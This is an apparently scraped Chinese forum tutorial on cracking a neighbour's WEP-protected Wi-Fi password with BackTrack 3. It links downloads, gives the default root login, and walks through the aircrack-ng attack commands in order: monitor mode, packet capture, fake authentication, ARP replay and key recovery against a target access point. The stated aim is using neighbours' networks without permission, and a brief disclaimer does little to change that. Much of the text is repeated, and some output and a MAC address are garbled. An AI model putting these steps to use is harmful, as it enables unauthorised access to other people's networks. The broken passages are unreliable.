清明归来放,无线网卡破密码(一)
声明:发布此帖的目的仅是对技术的一种追求。任何破解无线密码,并且占为己用的行为,视为恶意入侵的盗窃行为。请大家自重!
破解系列文章将分为三个部分:
此贴为第一话,将放出软件下载链接,及简要流程指引。
引言:
既然家中可以用小6搜索到邻居家的无线网络,那么只要我们通过正确的密码,就一定能使用这个无线网络。
破解逻辑:
1.目前大部分的居家无线网络都是加密的(呵呵,废话!),关键主要是基于WEP加密。
2.目前大部分的破解软件(如WinAirCrack)都不支持6515b的broadcom 43XX的无线网卡。
3.芸芸众生中,必有一款软件适合小6的无线网卡,那就本文的主角——BT3,基于linux的无线网络破解软件,良好支持RaLink、Broadcom、Atheros系列大部份芯片。
下载地址:
U盘版下载地址:backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
光盘下载地址:backtrack.mick27.info/bt3b141207.iso
破解系列文章将分为三个部分:
此贴为第一话,将放出软件下载链接,及简要流程指引。
引言:
既然家中可以用小6搜索到邻居家的无线网络,那么只要我们通过正确的密码,就一定能使用这个无线网络。
破解逻辑:
1.目前大部分的居家无线网络都是加密的(呵呵,废话!),关键主要是基于WEP加密。
2.目前大部分的破解软件(如WinAirCrack)都不支持6515b的broadcom 43XX的无线网卡。
3.芸芸众生中,必有一款软件适合小6的无线网卡,那就本文的主角——BT3,基于linux的无线网络破解软件,良好支持RaLink、Broadcom、Atheros系列大部份芯片。
下载地址:
U盘版下载地址:backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
光盘下载地址:backtrack.mick27.info/bt3b141207.iso
中文U盘工具下载地址:file/4871454552251231
使用指南:
1.推荐U盘版,大于1G的U盘一个,设置为FAT格式;
2.把boot和bt3文件夹放到U盘根目录底下;
3.打开boot文件夹双击运行bootinst.bat,U盘就会多出4个文件:“isolinux.boot" "isolinux.cfg" "isolinux.bin " 和"syslinux.cfg";
4.小6设置为U盘启动,开机进入BT3目录,进第一个选项;
5.输入用户名:root,密码:toor;
6.开始输入指令....
PS:光盘版即用刻录机镜像刻录iso文件即可,这样要浪费一张光盘。
第2话:(详见本贴26楼)
废话少说,直接上正文!
1.在shell窗口中输入 ifconfig 命令 ,出现如下信息:
lo no wireless extensions.
使用指南:
1.推荐U盘版,大于1G的U盘一个,设置为FAT格式;
2.把boot和bt3文件夹放到U盘根目录底下;
3.打开boot文件夹双击运行bootinst.bat,U盘就会多出4个文件:“isolinux.boot" "isolinux.cfg" "isolinux.bin " 和"syslinux.cfg";
4.小6设置为U盘启动,开机进入BT3目录,进第一个选项;
5.输入用户名:root,密码:toor;
6.开始输入指令....
PS:光盘版即用刻录机镜像刻录iso文件即可,这样要浪费一张光盘。
第2话:(详见本贴26楼)
废话少说,直接上正文!
1.在shell窗口中输入 ifconfig 命令 ,出现如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retryff RTS thrff Fragment thrff
Encryption keyff
Power Managementff
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2.出你的无线网卡名字,我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ,返回如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retryff RTS thrff Fragment thrff
Encryption keyff
Power Managementff
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2.出你的无线网卡名字,我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ,返回如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,outputs表示要生成的包的名称。回车运行。
4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C18:A5:B6 eth1
其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C18:A5:B6表示本机网卡MAC物理地址
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,outputs表示要生成的包的名称。回车运行。
4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C18:A5:B6 eth1
其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C18:A5:B6表示本机网卡MAC物理地址
5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C18:A5:B6 eth1
获取更多的数据包。
6.返回数据量到1万的时候就可以破解了。
再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解
第3话,主要内容为视频教程以及感言,下载地址在27楼
PS:小白,我没DC(抵制日货的后果),另外u盘启动BT3如何破解无线网络密码下不能截屏。由于第2话是简易指南,如果谁需要,我还可以提供更多资料。
总之,谁如果能正确安装BT3到小6,并且成功使用startx命令,破解就一定能够成功
获取更多的数据包。
6.返回数据量到1万的时候就可以破解了。
再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解
第3话,主要内容为视频教程以及感言,下载地址在27楼
PS:小白,我没DC(抵制日货的后果),另外u盘启动BT3如何破解无线网络密码下不能截屏。由于第2话是简易指南,如果谁需要,我还可以提供更多资料。
总之,谁如果能正确安装BT3到小6,并且成功使用startx命令,破解就一定能够成功
无线网卡破密码(二)
感谢热心期待的网友,下午上班时候偷偷放出第2话
废话少说,直接上正文!
1.在shell窗口中输入 ifconfig 命令 ,出现如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retryff RTS thrff Fragment thrff
Encryption keyff
Power Managementff
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2.出你的无线网卡名字,
废话少说,直接上正文!
1.在shell窗口中输入 ifconfig 命令 ,出现如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retryff RTS thrff Fragment thrff
Encryption keyff
Power Managementff
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2.出你的无线网卡名字,
我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ,返回如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,output
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,output
s表示要生成的包的名称。回车运行。
4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C18:A5:B6 eth1
其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C18:A5:B6表示本机网卡MAC物理地址
5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C18:A5:B6 eth1
获取更多的数据包。
6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解。
说明:第2话只是简易破解流程,懂BT3指令的可以自己玩。
到了这里,我可以明确的告诉大家,我们的小6在U盘启动和光盘启动BT3的时候,都无法加载startx指令,也就是说不能用图形化界面,没用shell指令,破解也进行不了。(原因就是ATI的芯片组,那么采用一种方法就是避免这个问题,正确启动BT3,啥东东,虚拟机呗,记得硬盘大于3G)
假设你还是没有看明白的话,请看第3话,BT3破解视频教程
表情符号为":"没有空格"o"和":"没有空格"8”
4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C18:A5:B6 eth1
其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C18:A5:B6表示本机网卡MAC物理地址
5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C18:A5:B6 eth1
获取更多的数据包。
6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解。
说明:第2话只是简易破解流程,懂BT3指令的可以自己玩。
到了这里,我可以明确的告诉大家,我们的小6在U盘启动和光盘启动BT3的时候,都无法加载startx指令,也就是说不能用图形化界面,没用shell指令,破解也进行不了。(原因就是ATI的芯片组,那么采用一种方法就是避免这个问题,正确启动BT3,啥东东,虚拟机呗,记得硬盘大于3G)
假设你还是没有看明白的话,请看第3话,BT3破解视频教程
表情符号为":"没有空格"o"和":"没有空格"8”
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论